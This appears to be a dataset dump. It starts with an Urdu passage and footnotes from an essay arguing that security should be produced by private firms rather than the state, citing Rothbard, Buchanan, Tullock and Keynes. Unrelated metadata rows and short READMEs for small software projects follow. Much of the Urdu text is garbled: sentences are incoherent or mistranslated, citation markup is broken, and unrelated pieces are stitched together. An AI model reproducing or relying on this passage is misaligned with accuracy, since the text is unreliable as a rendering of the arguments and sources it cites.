کرنے کے بنیادی اقتصادی مشکلات کےمقابلاجاتی استعمال میں، کس طرح سے ایک ریاست _ کوئی ادارہ جس کی مالی معاونت لگان کے علاوہ کسی اور زرایع سے نہیں ہوتی وہ اس کا اندازہ کس بات سے لگائے کہ کتنی تعداد میں سیکورٹی تیار کی جائے، اس کی لاتعداد خصوصیات کو کیسے کب اور کس کے لیے فراہم کیا جائے? اس کا جواب یہ ہے کہ اس کا کوئی معقول طریقہ نہیں جس سے اس سوال کا فیصلہ کیا جائے. صارفین کے نقطہ نظر سے، ان کی سیکورٹی کے مطالبات کو ضرور صوابدیدی طور پر سمجھنا چاہیے. کیا ہمیں ایک پولیس اہلکار کی ایک جج کی، یا 100000 کی ضرورت ہوگی? کیا انہیں ماہانہ $100 یا $10,000 ادا کرنے ہونگے? ایک پولیس اہلکار کو چاہیے، چاہے ہمارے پاس ان کی کتنی بھی تعداد موجود کیوں نہ ہو انہیں زیادہ وقت گلیوں کی نگرانی، چوروں کو پکڈ نے، اور چوری شدہ سامان نکالنا، یا ان افراد کی مکھبری کرنا جن میں کوئی ظلم کرنے والا نہیں ہوتا جیسے کہ فروشی، منشیات استعمال کرنے پر یا اسمگلنگ پر? اور کیا قاضیوں کو بحال اپنا زیادہ وقت اور طاقت سماعت طلاق کے مقدمات میں صرف کرنا چاہیے، ٹریفک کی خلاف ورزیوں، دکانیں اٹھانے کے اقدامات اور قتل یا بھروسے کے خلاف مادمات? ظاہر ہے کہ، ایک ان سوالات کا جواب کسی بھی طرح سے ضرور دینا چاہیے کیونکہ جب تک وہاں قلیل سہولیات ہیں اور ہمیں عدن کے باغ میں جینا پڈے گا، ایک چیز پر صرف کیا گیا وقت دوسری چیز پر صرف نہیں ہو سکتا. مملکت کو ان سوالات کا جواب بھی لازماً دینا ہوگا، لیکن یہ جو کچھ بھی کرتی ہے، یہ نفع اور نقصان کی کسوٹی کے شرائط پر نہیں کرتا. اسی لیے، اس کی کارروائی بنا قانونی جواز ہے اور لاتعداد مخرب غیر دانستہ طور پر صارفین کے نقطہ نظر سے ضروری ہے ۔[^25] صارفین کی بڈی ضروریات سے آزاد، ریاستی ملازم اس کے بدلے میں وہی کرتے ہیں جو اس کو لگتا ہے. کچھ کرنے کے بجائے وہ ارد گرد رہتے ہیں، اور اگر وہ کام بھی کریں وہ خود کو طاقت دینے کے لیے کرتے ہیں بجائے اسکے کہ لوگوں کو فائدہ پہنچے. پولیس افسران ارد گرد کافی سفر کرتے ہیں، جنہیں شاہد ٹریفک کی خلاف ورزی کرنے والوں پر جرمانہ عائد کیا جاتا ہے مجرم کے بغیر جرم پر بھاری رقم خرچ ہوتی ہے جس میں بہت سارے لوگ( یعنی غیر امیدوار) نہیں کرتے مگر کچھ لوگ اس کا دفاع کرنے کے لیے کافی پیسہ صرف کرنا چاہیے گیں، کیونکہ اس سے ان پر کوئی اثر نہیں ہوتا. صارفین کو فوری طور پر ضرورت پڈنے والی چیزوں کے مقابلے میں کٹر جرائم کو روکنے کے لیے ( یعنی جس میں مظلوم شامل ہو) کٹر مجرموں کے لیے فہیم اور موثر سزا، چوری شدہ مال کی وصولی، اور مظلوموں کو ان پر کیے گئے ظلم کا معاوضہ دلانا کافی بھاری بجٹ مختصر ہونے کے باوجود پولیس کا کام ناقابل قبول ہے.
اس کے علاوہ، مملکت میں ملازمت کرنے والے قاضی اور پولیس اہلکار (صوابدیدی جیسا کہ اسے ہونا چاہیے) وہ اسے قلت کے ساتھ کرنا چاہیں گیں کیونکہ ان کی آمدنی کا دارومدار کم و بیش لوگوں کے تجزیات پر منحصر ہے. اس طرح سے عدالتی عمل کی سُست رفتاری اور پولیس کے ظلم اور خودمختاری کا مشاہدہ ہوتا ہے. اس کے علاوہ،یہ قابل ذکر ے کہ نہ تو پولیس اور نہ ہی عدالتی نظام صارفین کو کوئبھی یکساں خدمات جس میں معاہدہ غیر مبہم انداز میں حرکت کر ایک مخصوص سیٹ کرنے کے لیے صارفین توقع کر سکتے ہیں کیا طریقہ کار رکھی فراہم کرتا ہے. اس کے برعکس، دونوں ایک معاہدہی تعلق کے طور خلا میں کام کرتے ہیں کہ وقت کے ساتھ ساتھ انہیں اپنے انضباط کاروائی جایٔداد تبدیل کرنے کے لیے اجازت دینے چاہئیں اور یہ واقعی مضحکہ خیز حقیقت کی وضاحت کرتا ہے کہ پولیس اور جج ایک طرف اور دوسرے طرف عام شہریوں کے درمیان تنازعات کی آبادکاری ایک آزاد تیسری پارٹی، لیکن ایک اور پولیس اہلکار یا جو آجر کو ایک جماعت کے ساتھ شریک قاضی سے تفویض کردہ نہیں ہے — حکومت — اس تنازعے میں.
[^16]: اس بحث پر Rothbard کی، "تخیل کی غیر جانبدارانہ ٹیکس کی وصولی،" دیکھیں p. 533\. اتفاقاً، ایک واحد انتشاری کا وجود اقتصادیات کے جایز ریاستی وجود کو کم و بیش ایک کسوٹی کے طور پر فاسد قرار دیتا ہے.
[^17]: بنیادی طور پر وہی مناظرہ عوامی اجناس کی مبینہ طور سے منفرد کردار پر خارج نہ کرنے کی کسوٹی کی طرف سے واضع طور پر سماجی اعداد و شمار کے قیاص کو مسترد کرنے کے لازم وجوہات میں ہے. اس کے بجائے اس طرح کے سامان کو ساماں کی کھپت کے مطابق درجہ بند کیا جاتا ہے(اوپر دیے ٦ اور ١٢ نوٹ دیکھیں). ایک چیز کے لیے، ایک ضبط کا اظہار بیان حاصل کرنے کے لیے انہیں *چاہیے* اشیاء کے مقابلے کی غیر رقابت کا اظہار بیان صارفین کے لیے مفت بازار میں نہیں لایا جا سکتا، یہ قیاص بجا اخلاقی ضروریات کی اسی مسئلے کا سامنا کرے گا. اس کے علاوہ، افادی استدلال بھی پوشیدہ طور سے غلط ہے. دلیل کے طور، جیسا کہ عوامی اشیاء کا قیاص کرنے والے کرتے ہیں، کہ آزاد رائیڈرز سے نونراوالراس کی کھپت میں صفر مختتم درجے کے اخراجات کی اجازت دیگا ساز و سامان سے استفادہ کو چھوڑ کر اس آزاد منڈی پر عمل سماجی بہبود کی ایک سبوپمال سطح کی نشاندہی کرےگا اور اسی لیے گے کومپانسٹری ریاست کے عمل پر دو متعلقہ شمار خراب ہے کی ضرورت ہے. پہلے، قیمت ایک کتابی زمرہ ہے اور اسے کبھی بھی کسی باہری دیکھنے والے کی طرف سے ماپا نہیں جا سکتا. لہذا ،یہ کہنا کہ اضافی آزاد سواروں کو مفت میں داخلہ دینا کسی بالکل بھی مثبت نہیں رکھتا. دراصل، کسی چارج کے بغیر زیادہ سے زیادہ صارفین کو اگرساپیکش اخراجات بیشک صفر ہوتا، نجی مالک-پیداوار جو سوالیہ ہے وہ ایسا کرتے. اگر وہ ایسا نہیں کرے گا، اس سے یہ سابت ہوتا ہے کہ اس کی قیمت اسکے لئے سفر *نہیں* ہے. اس کی وجہ اس کا یقین ہوسکتا ہے کہ ایسا کرنے سے اس کے اندر کا اطمنان دوسرے صارفین کے لئے کم ہوگا اور اس سےمسنوعات کی قیمت میں گراوٹ آیے گی؛ یا یہ مفت سفر کرنے والوں کے لیے نا پسندیدہ ہوگا، مثال کے طور پر جب میں اپنے ٹھکانے کے کمرے کو اس کی صلاحیت کے مطابق مہمانوں کو مدعو کرتا ہوں. کسی بھی صورت میں، کسی بھی وجہ کی بنا پر قیمت کو سفر نہیں مانا جاسکتا، پھر یہ کہنا بازاری ناکامی کے لیے غلط ہوگا جب کچھ اجناس کو مفت میں نہ سونپا جائے. دوسری جانب، فلاح و بہبود کا نقصان بیشک ایک بتانے کیلئے سامان جسے مبینہ طور پر فراہم کرنے نونراوالراس استعمال کے لیے اجازت کی عوامی اشیاء قانون کی سفارش قبول کر لیا تو لامحالہ بن مفت میں ریاست کی طرف سے ہے. اس کسوٹی کے علاوہ، ریاست، پُورا کرتا ہے کا تعین کرنے کے ناقابل تسخیر کام کے علاوہ آزاد صارف کی رضاکارانہ خریداری کے پہلے آف جوہرِ *کس طرح زیادہ سے زیادہ* عوام کی بھلائی کرنے کا تعین کرنے کا برابر انسلبلی مسئلہ کا سامنا کرے گا فراہم کرتے ہیں. ظاہراً، چونکہ عوامی اجناس مفت نہیں ہیں لیکن"کچھ استعمال کی سطح پر زیادہ رش کے تحت آتے ہیں، یہاں مملکت کے لیے کوئی بھی روکنے والی سطح نہیں، کیونکہ سپلائی کی کسی بھی حد پریس استعمال کرنے والے ہونگے جنہیں اخراج کرنا ہوگااور وہ زیادہ سپلائی کی وجہ سے مفت سفر کر پایے گیں. لیکن یہاں تک کہ اگر مسئلہ کو موجزاتی طور پر حل کیا جا سکے، اس صورت میں (لازمی چڈھاو) عوامی اجناس کی پیداواری قیمت اور تقسیم کا عمل بغیر کسی قیمت کے کم مقابلہ کی غیر رقابت پر ٹیکس ادا کرنا پڈے گا. اور پھر یہ،یعنی، یہ حقیقت کہ صارفین کو مفت سفر کرنے کے لیے مجبور کیا گیا ہے، جو پھر سے یہ ثابت کرتا ہے کہ بغیر کسی شک کے ان اجناس کی قیمت صارفین کے نقطہ نظر سے غیر سرکاری املاک کے مقابلے میں بہت کم ہے
[^18]: Orwellian double talk کی سب سے نمایاں جدید چیمپئنز Buchanan اور Tullock ہیں (نوٹ میں 3 اوپر حوالہ دیا ان کاموں کو دیکھو). وہ یہ دعوا کرتے ہیں کہ سرکار ایک "آیینی دستور" پر بنایی گیی ہے. جس میں ہر ایک افہام و تفہیم سے حکومت کی سخت قوتوں کو جمع کرواتے کے لیے رضامند رہتا ہے. لہزا حکومت صرف *بظاہر* سخت بلکہ *واقعی طور پر* رضاکارانہ عمل ہے. اس تجسس بحث کے لئے کئی واضح اعتراضات ہیں. پہلے, اس لڈایی کے پیچھے کوئی بھی تجزیاتی کے ثبوت موجود نہیں ہیں جس کو رضاکارانہ طور پر اس سے منسلک تمام افراد نے اس دستور کو قبول کیا ہو. تضاد کی شریعت کا انکار کرنا ایسا ہے جیسا کہ سب لوگ رضاکارانہ طور پر خود کو سختی کے تصور میں زیادہ سے زیادہ محض اسی طرح تخیل ہے. اس کے لیے اگر رضاکارانہ طور پر اعتراف کیا جبر رضاکارانہ ہے تو یہ ممکن تھا کہ تابعداری آیین کو منسوخ کیا جائے، اور ریاست ایک رضاکارانہ طور پر شمولیت اختیار کلب سے زیادہ نہ ہوگا. تاہم، اگر کس کو یہ حق نہ ہو کہ وہ ریاست کو نزر انداز کر سکے__ اگر اس کے پاس یہ حق نا ہو یہی ایک خصوصیت بلا شبہ ایک ریاست کا موازنہ ایک کلب کے ساتھ کرتا ہے __پھر یہ منطقی طور پر مثتب ہوگا کہ کسی کی رضاکارانہ ریاستی جابریت کو صحیح مانا جایے. اس کے علاوہ، اگر یہ سب ممکن ہوتا، آیینی رابطہ کسی کو بھی بغیر ان کے جنہوں نے اس پر دستخط کئے ہیں اس کے ساتھ منسلک نہیں کر سکتا.
::::Buchanan اور Tullock کس طرح ایسے بیہودہ خیالات کے ساتھ آ سکتے ہیں? علم المعانی چال کی وجہ سے. جو کچھ"ناقابل تصور اور جس پر کوئی معاہدہ نہیں تھا ان کے لیے Orwell Ian کی پچھلی باتیں ایک سبق آموز عمل کے لیے تصوراتی طور پر ممکن اور تصوراتی معاہدے کے وجوہات کی جست اور حدوں پر، جیمز بکانن کہتے ہیں ایک کانٹرکٹیان نقطہ نظر انتشار" *دستور کے معاہدے میں آزادی* (College Station: Texas A&M University Press, 1977). یہاں پر ہم سیکھتے ہیں(p. 17) اس کے برعکس کہ 55 میل فی گھنٹہ کی رفتار رضاکارانہ طور پر تسلیم کرنا ممکن ہے (بکانن کو پورا یقین نہیں ہے) کیونکہ یہ آخر میں رک جاتا ہے اور خیالی دستور کی پاسداری کرتا ہے، اور بکانن ایک اعداد و شمار کرنے والا نہیں بلکہ سچ میں ایک انتشاری ہے (p. 11).
[^19]: Rothbard, *Man, انسان ،اقتصادیات اور مملکت*, p. 887.
[^20]: سب سے پہلے یہ دماغ میں رکھنا ضروری ہے جب کبھی بھی کوئی کسی بحث میں عمل دخل کرے اسے اس دخل کے معیار کا پہلے موازنہ کرنا چاہیں، جیسے کہ مندرجہ ذیل مباحثہ by John Maynard Keynes (“The End of Laissez Faire,” in idem, *مجتمع لکھائی*, لندن: Macmillan, 1972, جلد IX, p. 291):
::::> ریاست کا اہم ترین ایجنڈا نہ ان سرگرمیوں سے تعلق رکھتا ہے جو نجی افراد کو پہلے ہی پورا ہیں بلکہ وہ افعال جو فرد، جو کہ ریاست ان کو نہ تو کسی ایک کی طرف سے بنائے جاتے ہیں ان فیصلوں کے لیے کے دائرے سے باہر نکلتا ہے. سرکار کے لیے ان چیزوں کو کرنے کی کوئی ضرورت نہیں جو پہلے سے ہی افراد کی طرف سے کی جاتی ہیں اور انہیں تھوڑا سا بہتر یا تھوڑا بدتر طور سےکرنا: بلکہ وہ چیزیں کرنا جو بالکل بھی نہیں کی جاتی.
::::یہ وجوہات نہ صرف *دکھتے ہیں* یہ ایک سچائی ہے
[^21]: کچھ آزاد مانئنارچسٹس یہ اعتراض کرتے ہیں کہ بازار کے وجود کو تسلیم کرانے اور نفاد شریعت کو نافز کرنے والے اداروں کو ایجنسی کے طور پر،اور لہذا ایک حکومت اجارہ دارانہ قاضی اور نافذ کرنے والے دفتر کے طور. (مثال کے طور پر دیکھیں، John Hospers، *آزاد رہ* Los Angeles: Nash, 1971]; Tibor Machan *انسانی حقوق اور انسانی آزادی* Chicago: نیلسن-ہال،1975[. اب یہ پریسپوزکہ ایک مارکیٹ کو تسلیم کرنےاور نافز کروانے کے اداروں کے تاثیر کے احوال ان قوانین کے یقیناً صحیح ہے. لیکن اس سے اسے اس کام سے کوئی اجارہ دارانہ دفتر کی پیروی نہیں کرتا. دراصل ایک عام زبان یا نظامی نشان کو بھی بازار سے پہلے سے ہی فرض کی جاتی ہے؛ لیکن ایک مشکل سے یہ غمان کرتا ہے کہ وہ اسی لیے حکومت کی زبان کے قواعد کی روایت کو یقینی بنانا چاہیے. زبان کے نظام کی طرح، پھر، بازار کے رویے کے قواعد خود بخود ابھرنے کے لیے اور غیر مرعی کے ہاتھ زاتی مفاد کی طرف سے نافز کیے جاسکتے ہیں. تقریر کے عام قوانین کے مشاہدہ کے بغیر، لوگوں کو مواصلاتی پیشکشوں کے فوائد کا فائدہ نہ اٹھا پائے، اور طرز عمل کے عام قوانین کے بغیر، مزدور کی تقسیم کی بنیاد پر لوگ تبادلے معیشت کی اعلی پیداوار کے فوائد سے لطف اندوز نہیں کرسکتے. اسکے علاوہ، جس کا میں نے اوپر اشارہ کیا، سرکار اور غیر جارحانہ اصول سے آزاد بازار کے کام کے اصولوں کا دفاع کیا جا سکتا ہے. اس کے علاوہ، جیسا کہ میں اس باب کے آخر میں یہ بحث کروں گا، یہ بالکل واضح طور پر ایک مسابقتی قانونی انتظامیہ اور نظام جو *اتفاق رائے* کے اعلی ترین ڈگری کے زریعے ظابطہ اخلاق کے نفاد کے لیے سب سے بڈا ممکنہ دباؤ پیدا کرتا ہے. اور بے شک یہ اصول وہ ہیں جو مفروضہ اولین ان وجوہات کو منطقی طور پر بحث کی پریسپوزشن کے معاہدے کے لیے ضروری ہے
[^22]: اتفاق سے، اخلاقی نظریاتی عہدوں، کے لئے فکر مند پس منظر بھی اتفاقاً ایک سلامتی کی پیداوار کا تصور نجی کاروباری صارفین کے اطمینان کا مسئلہ اقتصادی طور پر سب سے بہترین حل کے طور کسی طرف سے بھی قبول کرنے پر مجبور کرے گا کہ ایک ہی منطق، فورسز کلاسیکی آزاد خیالی کا سیاسی نظریہ کو چھوڑ کر اور چھوٹی لیکن اس کے باوجود (وہاں) سے فیصلہ کن قدم محسوس یا نجی املاک نراج کا نظریہ. کلاسیکل آزاد خیالی ،بیسوی صدی کے اولین نمایندہ لڈوگون مسز عدم جارحیت کے اصول پر مبنی سماجی نظام کی وکالت کرتا ہے. اور یہ ہے وہ کہ جو آزاد خیالی کی وکالت کرتا ہے. لیکن کلاسیکل آزادی پھر اس اصول کو اجارہ داری ایجنسی (سرکار، ریاست)__یا کوئی تنظیم جو پوری طرح سے رضاکارانہ تنظیموں اور دوسری خدمات پر منحصر ہے ان پرلاگو کرے گا. لیکن اس کے پاس صارفین پر اس علاقے کی سلامتی کے لیے اس کام کے لیے ٹیکس عائد کرنے کا حق ہے. اب، چاہے یہ سننے میں کتنا ہی خوشنما کیوں نہ لگے، یہ واضح ہونا چاہیے کہ یہ متضاد ہیں. یا تو جارحیت کا اصول جایز ہے، اس صورت میں اس ریاست کو جو کسی مخصوص رعایت کی حقدار ہومانوپالسٹ غلط ہے، یا وہ تجارت جسے جارحیت یا اس کے گرد بنایا گیا ہو__کسی وسیلے کو طاقت کی بنیاد پر حاصل کر لینا__جایز ہے، اس صورت میں ہر ایک کو پہلا قیاص اپنا لینا چاہیے. یہ ناممکن ہے کہ دونوں جگڈوں کو برقرار رکھنے کے لیے اور بلا شبہ عمل کے طور پر، جو عدم جارحیت کے اصول اور ریاست کی نصبت زیادہ جارحانہ بنیادی تشدد کے حق اور جو دونوں میں سے ایک اصول فراہم کرنا ناممکن ہے، جو دائرہ اقتدار کے مطلق ناکارہ گی سے جائز ہے، انہیں منطقی طور پر نکالا جاسکتا ہے. تاہم، آزاد خیالی نے کبھی بھی ایسا کوئی اصول نہیں دیا، نا یہ کبھی اس کو فراہم کر سکتا ہے، کسی بحث کے حق کے لیے ایک جارحیت کو آزاد کرنے کا مفروضہ اولین حق ہے. دی گئے حقیقت سے عدم جارحیت کے اصول جو اخلاقی جایز نہیں ٹھہرایا جا سکتا، منطق کے دباؤ سے آزاد خیالی کو چھوڑ کراس کے بجائے؛ اسکے چھوٹے بچے کو اپنا لینا: بدکاری، سرمایہ داری کے اصول کا فلسفہ، جو یہ مانگ کرتا ہے کہ سیکورٹی کی پیداوار کی زمہ داری غیر سرکاری تجارت کو اٹھانی چاہیے.
[^23]: مقابلاجاتی سلامتی کی پیداوار کو سامنے آنے والی مشکلات پر، see Gustave de Molinari, سیکورٹی کی پیداوار /0>; Murray N. Rothbard, *طاقت اور بازار* (Kansas City: Sheed Andrews and McMeel, 1977), chap. 1; idem, *ایک نیی آزادی کے لیے* (New York: Macmillan, 1978), باب. 12; W.C. Woolridge, *چچا سام اجارہ داری مرد* (New Rochelle, N.Y.: Arlington House, 1970), ابواب. 5–6; Morris and Linda Tannehill, *آزادی کے لیے بازار* (New York: Laissez Faire Books, ١٩٨٤), حصہ.٢
[^24]: Manfred Murck دیکھیں *Soziologie der Öffentlichen Sicherheit* (Frankfurt: Campus, ١٩٨٠).
[^25]: یہ کہنا کہ وسائل کو مختصر کرنا ایک اچھے نظام کے بغیر جابرانہ ہے کوئی بھی فیصلہ جو نفع اور نقصان کی بنیاد پر لیا جاتا ہے وہ کسی بھی صورت میں صاف و شفاف نہیں ہوتا. وہ نہیں ہے، اور اس طرح کے کوئی بھی فیصلے لینے سے فیصلہ بنانے والے پر کچھ پابندیاں عائد کرتا ہے. اگر، فرض کریں، پیداوار کی کسوٹی کو آزادانہ طور پر اس کا فیصلہ لیا جاتا، پھر یہ ظاہر طور پر اکثریت کی نمایندگی کرتا. لیکن اگر کوئی فیصلہ اس طرح لیا جائے یا اگر یہ کسی اور انداز میں بنایا گیا ہو، تو یہ اب بھی بنا قانونی جواز کے نقطہ نظر سے خریدار اور غیر خریدار کو رضاکارانہ طور پر خود مختار ہیں.
::::بہ لحاظ اسکے *جمہوری طور پر* Iضبط کے تحت مختص ہونے والی ضرورت کی خامیاں نمایاں ہو چکی ہے. جیسے کہ مثال کے طور پر، جیمز بکانن اور ریچارڈ ای. اس ویگنر لکھتے ہیں (*جناب کینز کے لیے نتائج* لندن: اقتصادی معاملات کا ادارہ, ١٩٧٨[, p. ١٩):
::::> بازاری مقابلہ مسلسل ہے؛ ہر ایک چیز خرید و فروخت پر، ایک صارف مسابقانہ بیچنے والوں کے درمیان منتخب کرتا ہے. سیاسی مقابلہ وقفے وقفے کا ہے؛ ایک فیصلہ عموماً کچھ سالوں کو اکٹھا کرنے کے لیے ہوتا ہے. بازاروں کا مقابلہ کیی سارے مقابلہ کرنے والوں کو بیک وقت قائم رکھنے کی اجازت دیتا ہے…. سیاسی مسابقت سے یا سب یا کوئی بھی نتیجہ سامنے نہیں آئے گا…. بازار کی مسابقت میں ایک خریدار ان چیزوں کو خریدے گا جو اس کی خریداری کے عین مطابق ہو. سیاسی مسابقت میں، ایک ایجنٹ سے خریداری کرنے کے اثر میں ہے، جس کے ساتھ وہ جڈ نہیں سکتا…. اس کے علاوہ، ایک سیاست دان کو دوسرے اکثر سیاست دانوں کی محفوظ شراکت کی ضرورت ہوتی ہے، ایک سیاست دان کے لیے ایک ووٹ کی قیمت ایک نجی "فرم" کے لیے ایک ووٹ سے کم پاک نہیں ہے.
::::جیمز بکانن کی، "بازار اور ووٹ کا انفرادی انتخاب،" دیکھیں، ان عڈم کی *خزانہ کے متعلق قیاص اورسیاسی اقتصادیات، "* چیپل ہل: شمالی کیرولینا یونیورسٹی پریس، 1962)؛ اس مشکلات کے بہتر علاج کے لیے بکانن اور ٹوللوک, *The Calculus of Consent.*
::::عام طور پر جو نظر انداز کیا جاتا ہے، اگرچہ__خصوصاً وہ لوگ لوگوں ووٹنگ کے لیے دیے گئے برابر کے جمہورحقوق کا فائدہ اٹھانا چاہتے ہیں، جبکہ صارفین کی غیر مساوی مختاری نابرابری کے ووٹ کی اجازت دیتا ہے _یہ سب کے لیے ایک اہم ترین کمی ہے: ایک صارف کی حاکمیت کے نظام کے تحت لوگ مساوی ووٹ ڈال سکتے ہیں، وہ ان چیزوں پر ان عملوں پر کنٹرول کر سکتے جن کو کرنے کے لیے ان پر دباؤ ڈالا جاتا ہے. ایک پیداوار کی جمہوریت میں ہر ایک کو فرد سے ان چیزوں کے لیے کچھ نہ کچھ کہنے کا جو اس کے پاس نہیں ہے فرض کیا جاتا ہے.؛ لہزا ایک راجدھانی کی بناوٹ کے لیے ایک کو جایز عدم استحکام پیدا کرنے کی اور منفی اثرات ڈالنے کے لئے مدعو کیا جاتا ہے، لیکن علاوہ ازیں غلط عمل سے. اس کے لیے لڈونگ وان مسز کی *سوشلزم* (Indianapolis: Liberty Fund, 1981), باب. 31.
| 486.54902 | 3,573 | 0.760015 | urd_Arab | 0.999972 |
972c7b34567c2ade3b41379d0b5e761b57e51cd7 | 610 | md | Markdown | README.md | jingwang88/weibo-react-app | 41dc3ac3c5fa083d7887151c8443bfe112e302ae | [
"MIT"
] | 1 | 2017-01-22T15:33:42.000Z | 2017-01-22T15:33:42.000Z | README.md | jingwang88/weibo-react-app | 41dc3ac3c5fa083d7887151c8443bfe112e302ae | [
"MIT"
] | null | null | null | README.md | jingwang88/weibo-react-app | 41dc3ac3c5fa083d7887151c8443bfe112e302ae | [
"MIT"
] | null | null | null | 1# weibo-react-app
This is a simple template for building Weibo React app.
# How to use it ?
1.Clone the repo:
```
git clone https://github.com/jingwang88/weibo-react-app.git new-project
```
2.Install the dependencies
```
cd new-project
npm install 或者 cnpm install
```
3.Start your webpack
```
npm build
```
4.Develop project
```
Add your code to component and open index.html
```
# npm publish failed 403
you may use some other source of npm , you can reset your npm register
```
npm config set registry http://registry.npmjs.org
```
# License
MIT(http://www.opensource.org/licenses/mit-license.php)
| 21.785714 | 71 | 0.722951 | eng_Latn | 0.824534 |
972c8ed91cab18b87ac1b90de55c07f5d26c88f0 | 552 | md | Markdown | mip-chinacn-search/README.md | beibeiwork/mip-extensions-platform | d2b494f8e0866bae508a1e6c4019c2eaae5f953e | [
"MIT"
] | null | null | null | mip-chinacn-search/README.md | beibeiwork/mip-extensions-platform | d2b494f8e0866bae508a1e6c4019c2eaae5f953e | [
"MIT"
] | null | null | null | mip-chinacn-search/README.md | beibeiwork/mip-extensions-platform | d2b494f8e0866bae508a1e6c4019c2eaae5f953e | [
"MIT"
] | 1 | 2018-02-26T01:43:17.000Z | 2018-02-26T01:43:17.000Z | # mip-chinacn-search
mip-chinacn-search 搜索
标题|内容
----|----
类型|通用
支持布局|responsive,fixed-height,fill,container,fixed
所需脚本|https://c.mipcdn.com/extensions/platform/v1/mip-chinacn-search/mip-chinacn-search.js
## 示例
### 基本用法
```html
<mip-chinacn-search>
<mip-form method="" url="">
<input data-role="searchKey" type="search" class="txt" placeholder="请输入关键词"/>
<span data-role="searchIcon" class="search search-btn"></span>
<input type="hidden" name="t" id="ztype"/>
</mip-form>
</mip-chinacn-search>
```
## 属性
## 注意事项
| 19.714286 | 89 | 0.650362 | yue_Hant | 0.332543 |
972cd7fb1597fe14ba82a15e03df4a69976035f9 | 108 | md | Markdown | _blocks/feature-33.md | jamesETF/EthicalFrenchie_Final | 7b803665d53a4c3520ca8711886ede8a85691c46 | [
"MIT"
] | 1 | 2021-05-24T15:38:24.000Z | 2021-05-24T15:38:24.000Z | site/_blocks/feature-33.md | vladignatyev/base64tool | e90402c2358c3943ed6a509237ab67e065fd443c | [
"MIT"
] | 5 | 2021-03-10T20:46:10.000Z | 2022-02-26T08:25:27.000Z | _blocks/feature-33.md | jamesETF/EthicalFrenchie_Final | 7b803665d53a4c3520ca8711886ede8a85691c46 | [
"MIT"
] | null | null | null | ---
title: Instagram Feed
icon: ios-instagram.svg
---
Display your latest Instagram image feed on the site. | 18 | 53 | 0.75 | eng_Latn | 0.868894 |
972d193aee5164cbb41f9e92d318fcfbb50bca1b | 65 | md | Markdown | nhu-cau/thue.md | lamrealtor/lamrealtor.github.io | dfc66db37a66f7c9b611dd784e55fe6e919e1472 | [
"MIT"
] | null | null | null | nhu-cau/thue.md | lamrealtor/lamrealtor.github.io | dfc66db37a66f7c9b611dd784e55fe6e919e1472 | [
"MIT"
] | 1 | 2021-03-30T02:34:41.000Z | 2021-03-30T02:34:41.000Z | nhu-cau/thue.md | lamrealtor/lamrealtor.github.io | dfc66db37a66f7c9b611dd784e55fe6e919e1472 | [
"MIT"
] | null | null | null | ---
layout: nhu-cau
title: Thuê
lang: vi
nhu-cau: thue
---
| 9.285714 | 16 | 0.569231 | vie_Latn | 0.935983 |
972d74f18230fe75ac056c0c44847e44d60ae79c | 1,017 | md | Markdown | README.md | maximal/yii2-coinhive-captcha | 39c92506043d8498ea52e8f8cbdf80965fcccc3c | [
"MIT"
] | null | null | null | README.md | maximal/yii2-coinhive-captcha | 39c92506043d8498ea52e8f8cbdf80965fcccc3c | [
"MIT"
] | null | null | null | README.md | maximal/yii2-coinhive-captcha | 39c92506043d8498ea52e8f8cbdf80965fcccc3c | [
"MIT"
] | null | null | null | # CoinHive captcha for Yii2
This widget implements CoinHive proof-of-work captcha for your Yii2 web application.
From a website owner’s perspective the CoinHive captcha works exactly like a conventional captcha,
such as Google’s reCaptcha.
The captcha is embeded as a usual Yii2 widget for ActiveForm with any of your model.
User client side generates a token. The token is submitted together with the other form data.
Then bundled captcha validator confirms this token on your server through CoinHive HTTP API.
Unlike with a conventional captcha however, the user does not have to “proof they’re human”.
Instead, the captcha is a “proof of work” — making it uneconomic for spammers to game your system.

## Links
* https://coinhive.com/documentation/captcha — CoinHive captcha documentation;
* http://www.yiiframework.com — Yii framework;
* https://maximals.ru — widget author’s website (Russian).
| 46.227273 | 111 | 0.791544 | eng_Latn | 0.969543 |
972d93e7d4bfbed9fdca3c7c4728826dd9bbd7c9 | 412 | md | Markdown | Packs/CommonPlaybooks/Playbooks/playbook-Isolate_Endpoint_-_Generic_CHANGELOG.md | asiadeepinstinct/content | dcb4a87a55d052e0189b6ed1059fb8116e7304ab | [
"MIT"
] | null | null | null | Packs/CommonPlaybooks/Playbooks/playbook-Isolate_Endpoint_-_Generic_CHANGELOG.md | asiadeepinstinct/content | dcb4a87a55d052e0189b6ed1059fb8116e7304ab | [
"MIT"
] | null | null | null | Packs/CommonPlaybooks/Playbooks/playbook-Isolate_Endpoint_-_Generic_CHANGELOG.md | asiadeepinstinct/content | dcb4a87a55d052e0189b6ed1059fb8116e7304ab | [
"MIT"
] | null | null | null | ## [Unreleased]
-
## [20.4.1] - 2020-04-29
Added new sub-playbook 'Isolate Endpoint - Cybereason'.
## [20.3.4] - 2020-03-30
Added new sub-playbook 'Cortex XDR - Isolate Endpoint'.
## [19.11.1] - 2019-11-26
New playbook outputs
## [19.11.0] - 2019-11-12
#### New Playbook
This playbook isolates a given endpoint using the following integrations:
- Carbon Black Enterprise Response
- Palo Alto Networks Traps
| 21.684211 | 73 | 0.701456 | eng_Latn | 0.710489 |
972dfc261036b0b3036463ac108b37d7054cdbfa | 208 | md | Markdown | README.md | zkyyo/douban-spider | bbb0758f7f22784d84088791eefae07d9bed9219 | [
"MIT"
] | null | null | null | README.md | zkyyo/douban-spider | bbb0758f7f22784d84088791eefae07d9bed9219 | [
"MIT"
] | null | null | null | README.md | zkyyo/douban-spider | bbb0758f7f22784d84088791eefae07d9bed9219 | [
"MIT"
] | null | null | null | # books-doubanSpider
## books.py
find books according to the tag and sort them
you can find tags [here](https://book.douban.com/tag/?view=type&icn=index-sorttags-all)
## movies_top250.py
use multithreading
| 29.714286 | 87 | 0.764423 | eng_Latn | 0.894698 |
972e17abe8b15bfa87560125139fd7934a0bf009 | 19 | md | Markdown | README.md | singleo0/login-simple-auth | bf0e4ab723bf9a281d916b512171f8f136cd8f5d | [
"Apache-2.0"
] | null | null | null | README.md | singleo0/login-simple-auth | bf0e4ab723bf9a281d916b512171f8f136cd8f5d | [
"Apache-2.0"
] | null | null | null | README.md | singleo0/login-simple-auth | bf0e4ab723bf9a281d916b512171f8f136cd8f5d | [
"Apache-2.0"
] | null | null | null | # login-simple-auth | 19 | 19 | 0.789474 | eng_Latn | 0.589692 |
